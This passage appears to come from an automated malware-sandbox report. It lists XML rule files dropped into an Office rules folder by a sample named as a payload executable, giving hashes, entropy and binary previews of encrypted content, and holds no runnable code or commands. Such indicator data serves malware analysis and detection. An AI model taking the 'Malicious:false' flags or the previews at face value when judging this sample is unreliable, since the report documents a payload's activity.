                                                                                                      Preview:<?xml.._...1.5.#..C.\.*.T.H..j.#.l.N.J.......a;^.+.>.a..V..."%G}th....../.v.cr|....N..i......@.2. ..}...3.nGX..f..7A..L.R2..A.uu......[..}..N...7.)....ul..6.Ms.}..h.........(....5..c..~.@K.>.so....I,8,J...H.b.UY.....0.nS..Q...`.*I.j..X.p....L.=\.......!..#y0..&.M.)...-.<.y.7_.R0_(/.L.4.e.X..Z.F.....pi..v.....Lr...9.....eLd.Z. ...&... i......s..+...qJ....|.....m^.....).n..U.R..>R...z."C.GrCmv..9..N...e.^.I..........6....s.....!....{[...~..I..&...~m.........4j1{}.Q^.J.t..>.H..teQ...=j...8....@%.......n.Ka8/.J...k.....4,m.........._....M.F....".....T1d.\.d...6....4s...0..u..J......tg.`b....s...3[Y....vz..Jd. ^...q....8'.8./+!.....a8...>..3+...8..@....3<..n_...4...CF ..-.....a....bL.....Kv.Zm.V_...$...k6.[w.?...y4.Q...(........F...F.z.....#."q.....H.....i5R.<.......s..S......F....(w.kR=.....P.x......^.B6......-.%..g..~..7.....4.C.....i...$.?7.q.%m...R.Zj>..Y.wbO......-a......7.5.v.$.....D<..evm.[o...r..L.R_..[.....'

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700850v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1711
                                                                                                      Entropy (8bit):7.883008676164951
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:+aAaDKTjsu+4gS1/q4Er1fjhI5fHLmIVCl4SStmJ4iWLsN4jgk8SM1bFeCgFN08T:3AdR5Z1/QJ6VnUpBBN4GUC2N066ebIwD
                                                                                                      MD5:8C0936D86E4AC3577ED8220157E37DC4
                                                                                                      SHA1:9E671417AC67320E00CAF48556D7CE5800CD59A5
                                                                                                      SHA-256:BDCDA3A5B72E15600B45BCB250BE0A1A051F60C15ED524F33A50F7C22A1B55A5
                                                                                                      SHA-512:4D3976804A5F0A30A6071D5F6E7BC5417821C36EFBB3CA8112D15783E45C4F89B76E562EA75210E2E411D23CC11387A1EF8E418951713369CC0FE000FC63A456
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml).K...JC..%....S.d.<.....q..E.H.....{...F%.q..'....6q...0:..Q.(O..D".g.....[.7..1....dm...3.7/...z+N^$....pp^...2..]..mZ;........t.1R5.`.t^.. ....%|.L....:V..0".W"LB..1.?.......y.rRY\C.nTe-H.........9.]..YB..S.d.R=1g..p....p..i..-.....^..j.[..d..9..e?..#.-.`W...%.G.....i.i.....R.S.$.N{.......Vz....<l..m..x...~Y.K...+.I...{B.TKdc.....0.-J......d..>..(1...vz..4.;...f.).w.$.3..j`.........}.d.\..H.N.S.P.....7...9...0.MQ.oT.........WF..-.c.F-z...l.a.{F4R*DG.X~...Q..k...5....R.........3 L.S.9.|.p.AR.. .9B.FO...W`..d..."...........{a.Q{..E4.. ....:.;mM..6..h.....\....H.$..I...<.......@./gi..*.......;\.....z.riP...L^.*i...7.,p..8.....^.+.~..LC.]U....c')..|;N....k]..]..."F5..;...T.\.9~.;.......T.x.}..*v...(...Z+.o..%....G.l...m."_.Y..2A..F.^M.....|Z.p...n..K..!................v.....>r...)+@.R..R.}Q?57I.L..6.s..@....5... .2O.b.'...S%;.]..:....Q>Y).a.o/.)....a....7.y]...z?..BhV/.L$....J.;.v6....o..'...E'.n..l.W...U..s..........3...1....2.f8..R.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700851v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1748
                                                                                                      Entropy (8bit):7.875105211221382
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:9LZeFwPSQ0yx9w0IHBecc02XAmRbdAl7jwD:9LZPSQ0Y9w0ILc02XFG8
                                                                                                      MD5:F65147455798D80F4C41F966086BFE7E
                                                                                                      SHA1:0D8B39D8AA1D93BF6C7DD8119E13A82F9AE0DE0E
                                                                                                      SHA-256:A5075A91C5FDAD328690314CD1708C74E085E28E24121EC2B236E211D266CC8D
                                                                                                      SHA-512:FC03E437A17FF4EFCBA535A72844044F8F21C6CCDEF7FED97E12A2E510D8FD7D72F880B661E741172030267557D5A30B38375EF5430892E0D38B6D59881D3AC5
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..O....".)l%.....<4 .{58....r8..>.....rW..p..L..wSKO&P...~..e_.J.$..~J_...H..X..G..w.1.p<E.F..t..s..@>..P..]..@.....P/a.{..........b.e....D.I.R..:.5..DmCX..O.<#'.;..h.`<......0K...b?..E..Ib2p.../.I....&......x32..n...lj.v` ....4.i}...~.........T......#..&..l......H;....z.~6.'4.R..!M..9&..&x.....H&.e=..@}s...%.S.p.4I..F'w.|.v...u..,.Hi.........v..+o3.\.....eU.'......"Lq.q).;f...yyu....B..f,..qH.>_...r...4..y.g.e1.c-.....!8.....K....j....}......Zi..Bm.1k.....m.j.#.?...Q.l.Z...+6W...X.ox.vY.......9.....[....e.5j......sr..J"...05_.1C.0..;P.H.....d8X.f..|..A2.%B.]!.....i/t.......Cg.....g.R......d.....O..MP\0....Xw. D....@z...n)>i...S.vh.#.O.....Dc........g.6.x...~.-.........m...k.....W2..).H...b....4t..3.B.W...".]T!q@..yu.j|.....j.m6......m,..p..^..J7..7.2@..,...n......e6...../.E.aD...d.=`..J!....8)@9.vI\.*.n2T.*..jH....'F0B..V.t....~..G6&.Y.....<...e..8"[`]..A.a.}..qN.....R. ix.x.....?... ...f..VY(..d....:..6...6.....?[O...$. ....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700900v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1704
                                                                                                      Entropy (8bit):7.882891742731221
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:XxXPb4bkZuqEcqBIPvWi7OYWjcDdQy2T6a4ikGWMwD:XxX8ihEAtOLjbmV
                                                                                                      MD5:FDAC3DC2C778F0B31C3D1B83F300AEE8
                                                                                                      SHA1:BB2CC1D4E94874D66B7E553785F130208BBD8FB1
                                                                                                      SHA-256:B48BA794DA3832BE4C41C7EF5C16EA2EC824EEF6D2D03885BA1F69BFCB529079
                                                                                                      SHA-512:D36166B737F7B680F855F2B59D6276C9E68FF9CE59C96F94892E7345C6BE8E9D0D7DCC61B540B3C77861B90A846FA6B39F41CEE71D223602B4053AE31DEF661E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.F..PY.3!.7#.TA.\.o....7.X..|.....,.S.....<.d..@).f....0.....~.s'..M..#lIW..[....lJ!....?.T1... ...w..G.s.9.%.u.?v..2.....\....s..."....%.0F.....Ag8.s9B..SG....(%.~.......a.._A$....m...`=v_a.F.z@..g..p..5.?..m0.......vSR..S.L....$...H]..=-.#.n..h...C]..S'......T..._1A.)Z.#y......],..3H....E.....Vp.......Q1.Y.......fg.*.9.=......Bev.....<.n..uY.B............c...r...|.k..+R....9....M.4Sv..s...?..-=#.u.#. ......2./.|...JZ...2...qN..d.F..=B.d...`u..x,VvTd.r........i..dt..@...<...y.umi=...d.vW..$......S.tQx.R.mA../?....i...[.?4E..9..'x..89Y...b-...=.e;n#.N..B.z..q4g.(h..}..+..fppq......b..m...w[...)..J..n..ly..m....vy....r&j........kp..S........vbW..S..9YT-.....12aN..Sn|.K.Z.\.P.U...y......H.ga...P.V.q...`R..9.gUQ.....^..T.ZGA...H.q..9[....1.....n).2..1.......<........'~....p....Fd.V....z.b..A\-...i....vK...N.t...).e.l............ap..........Z..|.;.)?... [..lU..*..mo.aS....h..r.2./...pL..G.xq...Dk7...9.......fB5.........Z%A.Z.q.Mv...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700901v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1741
                                                                                                      Entropy (8bit):7.883951892262562
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:yFrTXY0YsZj4CE23zay7nOHI+xBxF4IoFeJJ5wD:2DYrCEhySH5x7Jo
                                                                                                      MD5:B59C1DA818A3FD068BFAF477D98FD59E
                                                                                                      SHA1:32DE05A64216C0B96556B5F9DA58D6918D1664DC
                                                                                                      SHA-256:2C8DC2FB459964310CCEF9488F7C58DEC7546171D5AA7DFE7E7B04238F7622CF
                                                                                                      SHA-512:1E832A2D2B71B1B35268368C77AD1EB8D82825B059B684DF704B62EBF185AC5C682FF6DC04402958E936C3BD9FD303EA37F0128A2A35DF0638ABFC6F5DB6272B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.l).."......T..I.2..hU[...[.J..1(z..+.MC..m.C........*.t.+&z.K\).L..6../$.^Z....(...-....DT...L..Ie..S..>....IR.9.".M....H..#..P..1*.........@.A%.[.&>Q.....hX...D}.I.V.F....%..VR.....C._...`...F..6..;.......w..o.^bA..i~._C.... .. br............W..B..a^.!.:GF.1.....R..+.}........v.[.....R..@..f,..B0..4I.4.q.9n@-h...(Q.$2.m..*.Ni4I..i........dD...{....^Y..Q-f..'..*2....M..Y..GX,;......DS@(z.xL...E.....V.D...w..}..d/....X...:b...@...<.qRO{.....|......B..3........|..).|....4R.\.......n#;q)..0...i.L.b...........|.x.^...c....-A....n......\.:...fT................8.MUo.I...u.S..hbO].+.71&.....oqU'...Avg.y...J...S..0Ru.p.q.z.j...C..&.%...Ep.G5._ ..`.......I.}........J..G.....0z...@....[8$'..(....$..2..&r&..@.l..&.&dw.&.A&..K...!k..D...=.........u...].>.P.....'......wi..FI...Dcbj.&`..#efB.{.~..).....,.r.T....N...x..RTP{F~{..$......Xr..p........<fd*.j.\;...C...0n....1..c...=...)n.{.K.Pm.J...`B)k...>.9.q.Q..k./]yE5.)....K.l.:.rw..k.....F.>.l..R.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700950v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1702
                                                                                                      Entropy (8bit):7.890648292128814
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:LuNXglCwBd2r98cGJjnwmU/V6/LnBTYcyl3YMmwD:LuNXgrdU8c6wmU/V6Tycu7
                                                                                                      MD5:9E1BD92001C3C1A7840E498A50D4E038
                                                                                                      SHA1:95D356CC251C018B213C13C3385126FC85223D73
                                                                                                      SHA-256:CA34BC03A694D248167661596BA3F9041E67CD42C8B56F3371E52F66CD6B6F3C
                                                                                                      SHA-512:4DD13123EA6DED916C81E46343D2B4CD010B0BA60381F73CE38DDB9AD311F35016095FEFBE44353C75EC98517A4C009B78809D97A1F0D56EDB435B67790055B9
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml/........J...!..I^.>T.Xg...l.a...k{.].,.8F...s~.(+..\yUsY....h..|.V\L1>O.(g..W.......'&H*.q....M......UT...i.|y...F..,.<o.b."._.4.2..g.J(.......t.........<...+T....M.p....a.\+oI.,}...........p..h'u.]1T.r.+...:.V+..:.B....<....;t.^....t.6...l%q.`.....L...C.u..._.4.Kn5....~.`y..0..o.....{......fPO....{[*0A.#.|s.. .RWF..U.....m..#.K.k.9.....0...|L8o...EZ|....H....~.|=r.h.P.N.....0....uo..0_............@....Q#.e.o+..oJ.#..4.sa3.w..._Q.]..+i...B ...@ ..XUw.?..?.N@.(....Mv....f.....i.t...Y.=.T%...I.e.b...[*....{.fn...N!B.\..nY_........Q..u..W...;.E9.r..)..d...z.Z....\..L.....4O!:..\.r....|.M..;\..\.0.......+.,Ui....s.T....rC.[u4..<......LY....T.......$.5.|....R...S..3.D....K ...72V@.H.U&[2..9ry/.$..... S.3Q.,:...[BF..........G.QD'GGlm.7.0.n...W....1.%....=Kk...g.C. s........+}=.h......T..f.a./......N...'.x....)..% .. c.c...n..D..9..e.)].....*.A.I...B.qF.r..r.#......{..(.t..5.e-:uM.... ...J...H@....>..T....j...T.4../...y...m..4...2s*.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700951v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1739
                                                                                                      Entropy (8bit):7.905680374498205
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:AVEcJEFvZ6m6rQhgOGfQX5nl3vTuhTZ7cyj+wD:LrvZ6VQrfSlcyjz
                                                                                                      MD5:331DAD7C27EEEEECF045C41D01AC7ABE
                                                                                                      SHA1:6E3166D8B255A22C6E544880B0E8B983D2FA33CA
                                                                                                      SHA-256:54CEC0341E556CF1C5FC975E50F599F2BAED3485E8EB469FC76090EE9F2A600D
                                                                                                      SHA-512:C5AB9A0DC9DF700846D543058D8D83D47257A3048B4DC73102510CD62656EA8FC010A19B51F918E4617B0D9F91AA46D6703956D8BEC973F339CA3C69C7CB44AC
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml=.N.1h......Bs..F.....8b...Y..w...f(d.)...(.o8L.h...._B.Ia...x1..[t....!..BNh...q.`...aMR........`6:....^..$q.*.........BJ`..C..G.D...#&#.......?....H..Dt.}.{.^*R...a...FB.N..a1..y.....kC....R..........~...u..W.....In...Yd..1.")&.."`....=.G...f&/.6..2.j.*....}r.......c...W*-A.Q...q.Z/.%..F....].(,.Q........{:Y...Hb......C...8.dq..x<..*m.mZ!...}U.'5...;.:;.se....[......u.^.-f.....1..p...i.,.s.....H`.#..:..km.!...r...vX....U...q.f<).T.....ns.Y.J.o+S.h.5-.7........>...)a=(\.."r#.c.....a?X...jD.{fn..P...c....-...{....N.k....!.C!.O..T.V.s..u....9......}vs..:6.e..7...f.S.>..1.v.:..._...XK)...J....\]/..9wkZrs.I..."i,....D@<..9(.j....t...,...xc+.........+6...?..d..A~.wHx......).*;.x]C..N.uk.NHy...Q.x.......-1" .rA..WE$..\..75- @....-".&E.N..{w)....{.....Y..4^.di.[..X.A.......(.....N.E.=.2....vb....@%w..SW;.e..|..i.]0.=}p[..V{...wB.8.{K......!.Q.Jv..~..n'.....a.+;..-.kYe......1e..M... 4+.pJ...O..O&.].%....[..........Q(.).0.*@.Z.j..../2o

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701050v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1695
                                                                                                      Entropy (8bit):7.875186452997118
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:16uXgp/meO8R1CDGde475/V/B3lCPwYAmWwD:0Tp/TR1WGde4l/E3p
                                                                                                      MD5:BBA5058702A3290CE03B21AA62D725DD
                                                                                                      SHA1:4A5164A5E4A1E3A61CF36349093440AC891325F4
                                                                                                      SHA-256:7FCA40D764DD59D8554F4A943B056B6593BAC08E3014639AAA371F1717CF349A
                                                                                                      SHA-512:83E6515128D07CE9F3A677248B9B6F6D93E3B32A9462558EABF1BFDA4D008604FB0FDC4F8FC639B15F5C6D58D5598E69CE2F038FD7599BA6244BE7FA00A0EF2D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml\..\Q0.T|..{...B...!Jg..Q.......`..W...c.M....GP..q.>..)/B.h(d.w.dE;9k....g1..K..D{..y7.C.....,.5.f)>.8&.1.s...t.....H.....O...MG....h.zj..k}z..3/Np:.yx..V.^....v..........r..~.$......V...>Q4k.P.n.....\.....P6.8.3.w.5Yg./e.UC ULa.....p..j[...,U.m.1..Y..7.)...l.k.i~C....Kwo..:7w.C9?e."g.d....."...2..{:...e..B5.CY..&...&?2..5..:.v(.d....n.......1..(....Y...U0.Y.d.!.O.s...Y...c....L/%.o.....$.:{a...p.....m...4..>....}u;.....Js...L........v...?...7eu.e.PY...JF|%...~..7....Ay.......RL..v.I....~.j.[.....VA.r.T.....A.Nw....9?..,...n5..a<\.....S$..............b.J.!._.0".L.$...h?...B...'.B.DqF.'..0.d.Z.'.........@....; ......4...W.w.....7M+.....#a.........}GB.P..].s..yM...#./..|`I...dOU;.....u:@iVl,n....@_.gr..G...8.$..0..2D>3............6...>.o.(...Z.&9...7S..g.L..... ..A?...Q.B.....a#...*..........N.>....1.QrC.4.....X[...:.P..qq.LG.....-..xZaQ......$q...b..._.n8.%.g#`.V..X.xPfY..kU...s....y..g...w..............Y..0.^..a.....k...|TzoH...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701051v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1732
                                                                                                      Entropy (8bit):7.887191210941423
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:5ogBpR9OyxPGSWyrAPwnHxIYwmAUnEv4pGIowwt0zFHjHYkL+hr7VP2zfrxFIiXs:mgfR9hBpQwRIdRvIBYkKhrpPQlJXwD
                                                                                                      MD5:550D612F04BE8C7596904191D682BDCF
                                                                                                      SHA1:3984A7B31562DAA6E9C64D46D92407D6152F14D4
                                                                                                      SHA-256:27AABED51A6AD643824AAB5216D258E43F1432AADEEEED619FACC96DE10F43D9
                                                                                                      SHA-512:5083777F37930508E8161EE681986D0D355A9627D3F89D22ED13836530FE0B885ABCCC84F415235AEBCAEE701E0FF2662557CB4E038BE21BA23F85CF16244D3F
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..c.P.Jm}.;...d,3|.bf.B.f.ZK.#...A.\zD.t^.XfgD.4..%../9......a......b=.....K.-]t...CC.;iZ.}{...L..4N.....(M...:b..@fVm...3.....36C...@<f#].ZQ..h-.Q.Z.].$.z1.p.`-..s.g6....k.b.*Q....J.I......L........<KN.)c7T..p..}O.O.2......<6r.:...#k[...wsN.,.......K...q..pKBw|..t....k?.......DG...sK....o.....e..|..{...A...F...Gi$...d..9F.*Yzls.tK..Uu.U.3.......6V...lm.w..\A.=@J.T.....P#:v..F{.e..D.X.x,....|CQX.1.?.o.O....6.z..T.P..B.^..@T.Lz.a.....[.w......Yd..(C._.i.....^..\!(.p.h..*..O..^.+........I...m(....d.]u..2.s.g...G.7.... .cH.....K..$..Z...s..T.$5M.6.@...#.+..`...\..X.....m...l.|\........I[..Y.m.....r........;...5Y1u..pEa...2B4...Iq.z....8...K.&}...d....l.>.].B..\..."...N.....F..;o7.G.R0..}.......?.......Gx.."t...W.^.J`.......U..o...Ju...H.......t.....f.....k...5..`uk.8.5..\tH.{.8T.Y.+N.............k..P*>*P......z...W=.....6=...1{..L.]..Y...N.c.^.....O.w.u..0...4a..x.\:...vS&.Q.BR.....S....C......S...sqq..X....bb.dU.]y.?....9

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701100v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1707
                                                                                                      Entropy (8bit):7.883704252302233
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:fVDzRf8f6al+A0fNvRLoiLWzlyukJWe4CEwD:NvRf7bffLoiL6/kJW1Cd
                                                                                                      MD5:DFB1732BFD030330464C87FAC1EC026D
                                                                                                      SHA1:B6557F33BEDDF3DC511853CB263F8C3DF24C578E
                                                                                                      SHA-256:0B1C272B3943BFBC168F0621345FF15604F268EC835A0E9049C345EC33826243
                                                                                                      SHA-512:F1F53A3B4297C5E2D83D3619C45C44D82017A530621A5A35C98002895B4EAFCB2E4237571B4FAE60351E86D31E0B5E0570CE5575EAB0C31D3C1445160DB4B2E3
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlg....`kl..._h.n..!...h)W..5.[e.N...y.(-ZZ..+..h..jP.F,.gu.f.....'......KQ.....~..P......i(?..o.N.it...l:!.M..36..o..w.....!.....5.x@.."$5r%7$.<r."&.'|I29.+...]n..*3..V..X.Hh.].~v.}4i......y.N.Zo@..}..|..F..U..F.]....m.e..H.-9..\q~..p[...dm..7y5...a.....0.GA..T.\...<dE>..]B@....<7o>.@..MV..~F2.w.....M..m.Svx.c.}.`.J..%o.}.....Q....'O.CTY..Kj.{X_..>...c...^.....l...M.!.X.M7:...t...:..u...4..U.*..9..\lwD.n....M...C2;f4.dI.nbg....."._%[.U........m..2...............7...s;.....gY.'......D....w.>I.(e..k.....A"....EIe..t.f....{.d.B_.1.......r.y...J.. .....F.....Ss.....M..0R...w.:#[...p...S"..\.Y.......n...m-;..j.D@#...B.q.z.V....].w>.D.'..-...3...9...{.w.`....9....mdnr!...!R.....O;..!.;....R..R...IyG....v...IUL...^.s..A6....1i......Y.w.. +.N#....'5.b.Zp.!f-...&ng..-v\......o.x.UW\!.MR...>.q01....jq....l....+.>..kd..;.S.v..A......W.7k...U....L.....G.*..q*...u...^.]..PW*.k..&r..kp.T.+.^.C].2...^e..gj..E.rq....x..Jz7../.1A^.$.....'...6

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701101v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1744
                                                                                                      Entropy (8bit):7.902535272492045
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:1JctvWDao1/bT8HmViUchYhlswOLbCjFtTdl8U68PcwD:ItYb+mViUc+hlsHLOJtTn878Pl
                                                                                                      MD5:F880AE6F5AD2106ACE87B063F55F6C3E
                                                                                                      SHA1:AF1BF8AE0E0360C7B5609660137A05E2B9E0E408
                                                                                                      SHA-256:BEA83C6488BF54375AA8F836F6F2E9F5A55B5EC7704C91115FE860DACCA9AC26
                                                                                                      SHA-512:F9123C60E8AA694BB8419338ECC85493376CDBF0F1B07BB5A1D66940642442A4AE8375BCB3E16AE8A2D31D420953457131518A2AB61C761EC8BCA26F242FD0AE
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..<...c..%.e.m..w....p.%.-..4..l=.Lr+.u9G.+*..;....y1.!O..X..Vo..>].]!.C.k...F.|....~23.4.a. /..fdo......W...!......G.......E, ......Q.-.@..(....?GyT...jg.....eZ.....~.{|W.....<e..#..F.?.l..-.N......OR^.<.....UN}[..a...dW..*.4......)v.4..z.rJ.....~Cu..)a.-q..L.,......,...j...!g.-.S.....}..F......X.....y.jA./t.w..`6....R;......F.......[.-........z85<....d.QZ?S.k.^....r..n...W.......]}.#/.Y~\..`.......}G.&:+..Ld..s.>.pRc1."N..g..h......e........9..F>.......0...N.E4..B-.X.k.t.i......W.........J.4.._p.l..@...A...%.~..7........8S.........i}u....Z6@..C..7J.P..eMP.Eb....L.{jq...h....}#..I.u..^$.Vr..&..*..T.L".7....&p..$5z.H...3....B...p..^....[...C.R.....=.U. ...PV....[.l.g.O.....i/??..6}.}..V1....6.UjO..~.S..J.K...q......A..w..P..B..Z..j...^.5..H.\>W.8..[..ep.$H....s.....^w..%...../..4.....h>.....7%%W.Yy0.@T...A78R..#.Qb.'..v.....}..}|...[.._..!..Z..t...E.Rx......odR....;......K..#...M.U`....vj..ga..fM..S.?.^...~.j....)...E...n./....~.. ...p..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701150v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1697
                                                                                                      Entropy (8bit):7.8956382084526044
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:8iKHirnCJCOhCw1am5QuIFA+wYLPb1u3k69kezEPIwD:8i2irCJCbulYrb1u39kEEPR
                                                                                                      MD5:D9FD3A5040AA19D9A1709A65286347F3
                                                                                                      SHA1:E5B7D594B3AB1DA9A6F5E2EA2BD7F30A2FE930AC
                                                                                                      SHA-256:CAC89D6B88D0BA46E71A0C2B265742C67BC1141419A3431F6E8D04935EDDC593
                                                                                                      SHA-512:0D8CF61852B928A659A82E42699B3AD450B0D4F2B241405454A6BA230F12D557970B4AFDECE579282F670D012B1A34A28ADD3B0D29D62EE72B21390A8347F847
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..8.....7.d...(....N..-..k5`..!P.........-.'...`.?.x.%..S..T.....L..+)...`.[....yD.....P..?>R...!..~].....'....&.l.a$V3......&..Fa.e&..Y...P..p.I/6...L....HK...f.....I...l....W.8.`0.b.`.....b..Ew}-.2h1...{=.o^E.:..k.,...e.v...@./t...{~.... >..l.....R..j....K...-..d..G"....SW..j.,.M...a...(....5B...N.3.B"...i.*K.v[.a...`..7y....r....w.e...v)..f.E..L.d..y.%..K>..1a.p.z[<{} .....ER3Q...T.M..d...K/m...]........Pf.~gG...5.n...D..8Mw......&.S.B\=..r:....^... ..=<$.d...F.aL..zhA..4.=D...9...S!...'..v.1...,..2.!Z.....Z...1.k:M...r.TS....._..x.X.F.[.q..1...y...F.:1.h....FGh.\.}u~.,O..3..]..c.........#%8er..g..29....e.....V...E.."o.6...'..(3...'.. ....p..6i.Q...0a.|D...N....L~..*1...O...t.c..}Oy.]...U.n...j8...R.......\JP..R.|.....Y..Oa.Qn...Z0....T.....De...**`.O......N@....w.".U.|.D.Y.L....2M....v.c..y...,.Z\.- .`.....V..\...|...k.A..{t.Y7..lAq...6.....s.C..n..e'5.......n.t{G.%/1?..2.}.Y.<,.OA.=..N.i8..`l.:.....t..S.6....4..z..].t...1....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701151v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1734
                                                                                                      Entropy (8bit):7.896897817896618
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:XGGlGT8LegzxAZZqYLfolT6bb2+QQ6tYNfBjwD:XGKDpxAZZqYkcvzQQ6eNJI
                                                                                                      MD5:090F80EC699FF4442647F80B39934AE5
                                                                                                      SHA1:F67D8BAC023C640B2FB63A2111EB55883BBAA621
                                                                                                      SHA-256:33139FC3FBD1BB9082ABD62882DF98520CB12793B2A7E7A6576A6DDD2F002B0D
                                                                                                      SHA-512:E714D0F6D077CD20B81BBF52472292F4CE675806E2669E6F047BBF45AD69091F2D28D7F6C0BA0584AB660835E368CEB2EE154A0D8007A38E53F376A3D82B2D0A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml4.P.Q.P.....J_.z;0..$...CP9.......r.?G.7"kA?...im......<..a../4... .fj.F..mt..t$.K..s&....4R..*X.x.m..M.....:.T..2..@4-6.:..9V9G^l.'.pj....8r._.Fq.B...r.l.....'.....#j2s....*~.z06Bx[..d. f.,...BG......q_.i....M........Y.k..*...:Z...f....Jp...c....w.z.L.].....*....o.......4.R.......|#W`.o...A_C).......=.K(.U..U....to..<c..{..^.#....Q....BSR........w$.....s+....Xg`..h.R.sbI.:..y....{D9f.|.....u.n....G..7N...yE.s.H)..Q..:..-..3......I....t.k[...I.!9.D.I.P.x.LJ.M.z@.?.........z..%..b.1.8.C.1D..gEZ}.P.4.........I...V..[..4f..|.'.s.5!...,j.d..._\Y....&|.......|.5K..ha`!p...5..$2.R&.*.Sb..y..#Xs..7z.Y....J. .Z....T.Y....T.W........^.t...UX@......V...}..;kC.U...!..Q0...;#.._L]..o....z.Db..r....l.J.@.e..%/.o...4.U......7.oz/...7..s=.....x...........tM...s...o..Y.z....p$.....,...W.U....v...E..F.G...9Pt....w.vf.eu.i......".-...2...".. .6X...lP...+..7...u..}i..=e-... K.WK)......bU5....Z.&...*V......<.!8.J...........WV..-\.......1..^.w.....$>....1Z..l

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701200v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1689
